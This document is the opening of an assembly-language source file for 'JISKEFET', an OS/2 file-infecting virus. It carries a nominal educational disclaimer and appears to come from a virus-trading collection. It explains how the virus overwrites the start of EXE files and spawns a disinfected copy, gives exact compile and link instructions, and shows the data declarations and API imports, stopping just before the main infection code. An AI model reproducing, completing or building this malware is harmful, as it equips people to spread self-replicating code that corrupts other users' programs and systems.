-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- --------- Rippppppped Off The NuKNET For Your Enjoyment...----------- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- comment # JISKEFET: a non-resident direct-action OS/2 virus Disclaimer: This file is only for educational purposes. Do not abuse it! The author takes no responsibility for anything anyone does with this file. How does this virus work? Like most non-resident viruses, it first infects other programs and then runs the original program. It infects programs by copying the first part of the program (with the same size of the virus) to the end of the program and then overwriting the begin with the virus. When an infected program is executed, the virus will make a copy of the infected program and disinfect it. It will then spawn the disinfected copy. This is perhaps not a very elegant method. It would be nicer if the virus could jus disinfect the current program and spawn that one. But OS/2 doesn't allow a program that being executed to be altered. The proper way to compile this virus is like this: first, just compile it. Then check the size of the new created exe file. It should be the same as the value for VIRLEN below. If not, change the value for VIRLEN and compile again. Unfortunatly, I don't know of a way to tell the compiler what the si of an EXE file will be after compilation. Also check out the offset of the 'MK' signature in the EXE file. It should be at the offset MKOFF. You might have to change this one too. To generate an exact copy of the original viru use MASM.EXE v5.0 and LINK386.EXE v2.00.000. COMPILE.BAT: ........................................................................... masm.exe /Zi %1.asm; link386.exe /exepack %1.obj,,,doscalls.lib,%1.def ........................................................................... JISKEFET.DEF: ........................................................................... name Jiskefet windowapi ;A virus must have a name. This one is ;dedicated to the people of 'Jiskefet', ;the funniest TV program in the Netherlands ;These guys are really excelent! ;'windowapi' means that this virus will be ;compiled into a P.M. application. protmode ;It will run in protected mode. stacksize 8192 ;Yes, the virus needs some stack. ........................................................................... The file doscalls.lib should be in the OS/2 directory. Copy it to your work directory or enter the full pathname in compile.bat. To compile this file type: compile jiskefet # ;========================================================================== .286 ;80286 opcodes can be used. .radix 16 ;All numbers are hexadecima ;by default. VIRLEN equ 2048d ;This will be the size of t ;compiled virus. MKOFF equ 400 ;At this offset in the EXE ;will be the 'MK' signature _srec struc ;Structure with information cdate dw ? ;about file, returned by th ctime dw ? ;DosFindFirst and DosFindNe adate dw ? ;functions. atime dw ? wdate dw ? wtime dw ? fsize dd ? falloc dd ? fattr dw ? fcount db ? fname db 100 dup (?) _srec ends extrn DosFindFirst:far ;These external kernel extrn DosFindNext:far ;functions are used by the extrn DosFindClose:far ;virus. extrn DosOpen:far extrn DosClose:far extrn DosRead:far extrn DosWrite:far extrn DosChgFilePtr:far extrn DosNewSize:far extrn DosGetEnv:far extrn DosExecPgm:far extrn DosExit:far extrn DosDelete:far DGROUP group _DATA _DATA segment word public 'DATA' ;Variables used by DosFindF ;and DosFindNext functions: filename db '*.EXE', 0 ; Filenames to search for. dirhan dw ? ; Handle. sbuf _srec <> ; Struct. with returned in srchcnt dw ? ; Number of files to searc ;Variables used by DosOpen: faction dw ? ; Open mode. fhandle dw ? ; Handle. fhandle2 dw ? ; Handle. ;Variables used by DosRead ;and DosWrite: rlen dw ? ; Number of read bytes. wlen dw ? ; Number of written bytes. ;Variables used by ;DosChgFilePtr: new_off dw ?, ? ; New offset. ;Variables used by DosGetEn envseg dw ? ; Segment of environment. cmdoffs dw ? ; Offset of arguments in e ;Variables used by DosExecP objbuf db (40) dup (?) ; Buffer for error-info. retcode dw ?, ? ; Returns exit-code. ;Other variables: NE_buf db (40) dup (?) ; Buffer for NE header. namebuf db (100) dup (?) ; New filename for spawnin buffer db (VIRLEN) dup (?) ; Main buffer. _DATA ends ;-------------------------------------------------------------------------- ; Main program. ;-------------------------------------------------------------------------- _TEXT segment word public 'CODE' assume cs:_TEXT, ds:DGROUP